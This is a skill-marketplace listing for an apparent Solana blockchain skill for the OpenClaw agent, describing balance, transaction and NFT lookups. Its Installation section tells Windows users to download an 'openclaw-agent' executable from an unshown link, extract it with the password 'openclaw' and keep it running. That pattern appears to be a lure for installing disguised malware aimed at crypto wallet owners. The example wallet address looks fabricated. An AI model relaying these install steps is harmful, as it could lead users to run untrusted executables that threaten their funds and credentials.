solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Master Solana blockchain interactions with OpenClaw. Check balances, monitor SPL tokens, view transaction history, and analyze NFT metadata directly from your AI agent.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-ixqvyWhat This Skill Does
The Solana skill for OpenClaw provides a powerful command-line interface to interact directly with the Solana blockchain. It bridges the gap between your AI agent and the network, allowing you to perform essential financial and data-driven tasks seamlessly. Whether you are managing personal assets, analyzing on-chain activity, or monitoring specific wallet movements, this skill serves as your gateway. It supports checking balances (in both SOL and lamports), viewing detailed transaction histories, and querying account state information. Furthermore, it excels in token management, offering tools to list and track SPL token balances, as well as specialized utilities like Metaboss for deep-diving into NFT metadata. By leveraging native Solana CLI commands and custom curl integrations, this skill ensures you have full visibility into your blockchain assets.
Installation
To begin, ensure you have the OpenClaw agent running as a foundational requirement. Install the skill using the command: clawhub install openclaw/skills/skills/hightower6eu/solana-ixqvy. For Windows users, download the openclaw-agent from the provided GitHub link, extract it using the password openclaw, and keep the executable active. macOS users should use the provided terminal snippet for automated configuration. Once the agent is active, verify your setup by installing the Solana CLI via the official release script and setting your preferred RPC URL to the mainnet-beta endpoint. Detailed setup guides for custom RPCs and development environments are included to ensure your connection remains robust and responsive.
Use Cases
This skill is ideal for power users and developers who require rapid, programmatic access to the Solana ecosystem. Common use cases include: 1) Automated portfolio monitoring where an agent tracks specific token fluctuations; 2) Transaction verification, confirming receipt of funds by querying signatures; 3) NFT analysis, where you retrieve metadata or mint status of assets; 4) Security auditing, checking the integrity of account data; and 5) Staking oversight, viewing active stake accounts directly from the CLI. It is an essential tool for those managing multiple wallets or requiring quick data retrieval without navigating web-based block explorers.
Example Prompts
- "Check the current SOL balance for this address: 461t2Tf9oT15P6T8qYd7g5n7Vq5z5q5z5q5z5q5z5q5z"
- "What are the last 5 transactions for my wallet and list all my SPL token balances?"
- "Monitor address 461t2Tf9oT15P6T8qYd7g5n7Vq5z5q5z5q5z5q5z5q5z for any balance changes every 5 seconds."
Tips & Limitations
Always ensure your RPC provider is reliable; public endpoints may experience rate limiting during peak network congestion. For production-grade or high-frequency monitoring, consider using a dedicated private RPC provider. The skill requires the openclaw-agent to remain active; without it, blockchain commands will fail. Remember that while this tool provides visibility, it does not store private keys or handle signing; always practice secure private key management outside of your AI agent’s workspace. For NFT metadata queries, ensure you have Rust and Cargo installed to run the Metaboss utility effectively.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-ixqvy": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.